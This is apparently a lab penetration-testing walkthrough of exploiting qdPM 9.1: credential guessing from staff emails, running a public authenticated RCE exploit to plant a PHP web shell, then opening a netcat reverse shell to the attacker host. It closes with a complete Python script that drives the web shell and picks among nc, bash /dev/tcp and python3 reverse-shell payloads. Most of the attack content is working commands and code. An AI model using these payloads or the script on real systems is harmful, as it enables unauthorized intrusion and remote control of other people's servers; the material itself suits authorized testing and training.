Published on June 14, 2025
This guide walks through exploiting a public vulnerability in qdPM 9.1, a web-based project management application. We demonstrate the exploitation process using an authenticated remote code execution (RCE) exploit.
A target system at 192.168.50.11 was scanned and found to have ports 22 and 80 open. Port 80 served a web application for an AI development company, built on qdPM 9.1; the version string was exposed in the page's HTML footer.
The "About Us" page listed the email addresses of several staff members. A dictionary attack against the login portal, using those addresses as usernames, identified one valid set of credentials:
george@AIDevCorp.org : AIDevCorp
With the application version known, we used searchsploit to locate any matching public exploits:
searchsploit qdPM 9.1
This revealed an authenticated RCE exploit, Exploit-DB ID 50944. To mirror it into the current directory:
searchsploit -m 50944
The exploit arrives as 50944.py. Read it before running it: a public exploit is untrusted code, and knowing what it does (here, authenticating to the application and uploading a PHP web shell) also tells you which artifacts it leaves behind for cleanup.
With credentials in hand, we executed the exploit:
python3 50944.py -url http://192.168.50.11/project/ -u george@AIDevCorp.org -p AIDevCorp
Output confirmed that the web shell was uploaded to:
http://192.168.50.11/project/uploads/users/420919-backdoor.php
We tested the shell with curl (the URL is quoted because ? is a shell glob character):
curl "http://192.168.50.11/project/uploads/users/420919-backdoor.php?cmd=whoami"
Output:
www-data
Before attempting a reverse shell, we confirmed that nc was present on the target. The command is sent form-encoded in a POST body so that the space in "which nc" survives intact:
curl http://192.168.50.11/project/uploads/users/420919-backdoor.php --data-urlencode "cmd=which nc"
Start a listener on the Kali attacking host (192.168.50.129):
nc -lvnp 6666
Trigger the reverse shell through the web shell. Note that the -e form requires a netcat build that supports it (traditional or BusyBox netcat); the OpenBSD netcat found on many Debian-based systems does not, and the "which nc" check above only proves that some nc binary exists:
curl http://192.168.50.11/project/uploads/users/420919-backdoor.php --data-urlencode "cmd=nc -nv 192.168.50.129 6666 -e /bin/bash"
A successful connection on the listener gives an interactive shell on the target as www-data.
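The validation steps above (prove the shell executes commands, check what the target has, then pick a payload) can be scripted. The following is an added example, not code from the page, the qdPM project or exploit 50944. It assumes the web shell URL, attacker address and port shown in the walkthrough, and that the shell takes its command in a POST parameter named cmd as the curl commands above do. It goes slightly beyond the page by falling back to a bash /dev/tcp or python3 payload when the target's nc lacks -e.

```python
# Added example (not code from the page, the qdPM project or exploit 50944):
# drives a command web shell like the one 50944 drops, checks what the target
# has available, and chooses a reverse-shell payload accordingly.
# Hosts, ports and the shell URL below are assumptions taken from the writeup.
from typing import Optional
import urllib.parse
import urllib.request

DEFAULT_SHELL_URL = "http://192.168.50.11/project/uploads/users/420919-backdoor.php"


def webshell_request(shell_url: str, cmd: str) -> urllib.request.Request:
    """Build a POST to the web shell with the command form-encoded in the
    body, as `curl --data-urlencode "cmd=..."` does. Sending it in the body
    rather than the query string keeps spaces and shell metacharacters intact
    and keeps the command out of the URL field of the server's access log."""
    body = urllib.parse.urlencode({"cmd": cmd}).encode()
    return urllib.request.Request(shell_url, data=body, method="POST")


def run_cmd(shell_url: str, cmd: str, timeout: Optional[float] = 10.0) -> str:
    """Send one command through the web shell and return its output
    (network call; only used from main())."""
    with urllib.request.urlopen(webshell_request(shell_url, cmd), timeout=timeout) as resp:
        return resp.read().decode("utf-8", errors="replace").strip()


def parse_which(output: str) -> dict:
    """Parse the output of `which nc bash python3` into {tool: path}.
    which prints one absolute path per tool it finds and nothing for the
    rest, so a missing tool simply has no entry."""
    found = {}
    for line in output.splitlines():
        line = line.strip()
        if line.startswith("/"):
            found[line.rsplit("/", 1)[-1]] = line
    return found


def nc_supports_exec(help_text: str) -> bool:
    """Heuristic on `nc -h 2>&1`: traditional netcat, BusyBox nc and ncat all
    list a -e option in their usage text; OpenBSD netcat does not, so a
    `nc -e` payload would fail there."""
    return any(tok.rstrip(",") == "-e" for tok in help_text.split())


def reverse_shell_payload(tools: dict, nc_help: str, lhost: str, lport: int) -> str:
    """Choose a reverse-shell one-liner for the tools actually present.
    Preference: nc -e (what the walkthrough uses), then bash's /dev/tcp
    pseudo-device, then python3. The bash form is wrapped in `bash -c`
    because the web shell most likely runs commands through /bin/sh, which
    does not understand `>&`. Raises if nothing fits."""
    if "nc" in tools and nc_supports_exec(nc_help):
        return f"nc -nv {lhost} {lport} -e /bin/bash"
    if "bash" in tools:
        return f"bash -c 'bash -i >& /dev/tcp/{lhost}/{lport} 0>&1'"
    if "python3" in tools:
        return (
            "python3 -c 'import socket,subprocess,os;"
            f"s=socket.socket();s.connect((\"{lhost}\",{lport}));"
            "[os.dup2(s.fileno(),fd) for fd in (0,1,2)];"
            "subprocess.call([\"/bin/bash\",\"-i\"])'"
        )
    raise RuntimeError("no usable reverse-shell tool found on target")


def main(shell_url: str = DEFAULT_SHELL_URL, lhost: str = "192.168.50.129", lport: int = 6666) -> None:
    # 1. prove the shell executes commands and learn which user it runs as
    print("running as:", run_cmd(shell_url, "id"))
    # 2. find out what is available before committing to a payload
    tools = parse_which(run_cmd(shell_url, "which nc bash python3"))
    nc_help = run_cmd(shell_url, "nc -h 2>&1") if "nc" in tools else ""
    payload = reverse_shell_payload(tools, nc_help, lhost, lport)
    print("payload:", payload)
    # 3. fire it; the request blocks until the reverse shell disconnects,
    #    so start `nc -lvnp 6666` on lhost before running this
    run_cmd(shell_url, payload, timeout=None)


if __name__ == "__main__":
    main()
```

The decision logic is kept in pure functions so it can be exercised against captured command output without a target; only main() touches the network.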
Leveraging public exploits depends on three things: an accurate version fingerprint, valid credentials where the exploit is authenticated, and a way to validate the shell you obtain. Always review exploit code before running it, note the artifacts it leaves behind (here, a PHP file under uploads/users/ that should be removed once testing is complete), and use it only within authorized engagements.